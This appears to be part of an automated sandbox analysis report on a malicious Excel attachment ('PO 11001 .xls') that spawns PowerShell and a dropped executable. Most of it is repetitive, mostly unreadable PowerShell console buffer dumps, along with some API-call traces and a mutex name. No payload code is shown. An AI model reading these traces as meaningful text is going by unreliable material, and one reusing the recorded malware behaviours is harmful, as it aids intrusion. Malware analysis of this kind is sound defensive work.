          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,34_2_00413D4C
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 11_2_004020FE CoCreateInstance,11_2_004020FE
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,34_2_0040B58D
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\54230000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-DSGECX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR87C5.tmpJump to behavior
          Source: PO 11001 .xlsOLE indicator, Workbook stream: true
          Source: 54230000.0.drOLE indicator, Workbook stream: true
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................B.......B.....}..w.............................1......(.P..............3......................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm................%.....p.Vk....}..w............\.......................(.P.....................X.%.............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............X,u.......Vk....X.t.....(.P.....................................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm................%.....p.Vk....}..w............\.......................(.P.....................X.%.............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............X,u.......Vk....X.t.....(.P.....................................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.......%.....N.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.X,u.......Vk....X.t.....(.P.......................%..... .......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............X,u.......Vk....X.t.....(.P.....................................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~...................%.....@.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............X,u.......Vk....X.t.....(.P.....................................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....%.....N.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............X,u.......Vk....X.t.....(.P.............................l.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ...............}..w............X,u.......Vk....X.t.....(.P.......................%.............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................0........WA.....}..w....X.%.....@E......^...............(.P.......................%.............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................WA.....}..w....X.%.....@E......^...............(.P.......................%.............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......T........U.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......T........U.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3........U.........................s....................".......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......T........U.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......T........V.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......T........V.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............-V.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............:V.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......T.......OV.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............\V.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............pV.........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............~V.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$................V.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................V.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................V.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................V.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3........V.........................s....................".......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................V.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................V.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................W.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................W.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............)W.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............;W.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............GW.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............YW.........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......T.......fW.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$.......T.......{W.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......T........W.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......8Y.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......DY.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.......VY.........................s....................".......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......bY.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......tY.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Y.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Y.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Y.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Y.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Y.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Y.........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Y.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$.......8........Y.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Y.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Z.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......!Z.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.......3Z.........................s....................".......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......?Z.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......QZ.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......]Z.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......oZ.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......{Z.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Z.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Z.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Z.........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Z.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$.......8........Z.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Z.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Z.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........Z.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3........[.........................s....................".......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........[.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........[.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......<[.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......N[.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......Z[.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......l[.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8.......x[.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........[.........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........[.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$.......8........[.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......8........[.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................\.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................\.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............'\.........................s....................~.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............3\.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........G\.........................s.................... .......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............S\.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............f\.........................s....................R.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............r\.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................\.........................s....................R.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................\.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................\.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................\.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................\.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................\.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$................\.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................\.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................].........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................].........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3........].........................s....................".......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......<].........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......N].........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......Z].........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......l].........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......x].........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........].........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........].........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........].........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........].........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$.......t........].........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........].........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................].........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................].........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3........^.........................s....................".......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................^.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................^.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............:^.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............L^.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............X^.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............j^.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............v^.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................^.........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................^.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$................^.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................^.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................^.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................^.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3........^.........................s....................".......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................^.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................_.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................_.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............*_.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............6_.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............H_.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............T_.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............g_.........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............s_.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$................_.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................_.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................_.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................_.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3........_.........................s....................".......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................_.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................_.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................_.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................`.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............+`.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............I`.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............]`.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$...............|`.........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................`.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$................`.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$................`.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t......."a.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........a.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.......@a.........................s....................".......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......La.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......^a.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......ja.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......|a.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........a.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........a.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........a.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........a.........................s....................`.......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........a.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............$.......t........a.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........a.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........b.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........b.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3........b.........................s....................".......8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......+b.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......=b.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......Ib.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......[b.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t.......gb.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........b.........................s............................8...............Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............$.......t........b.........................s............................................Jump to behavior
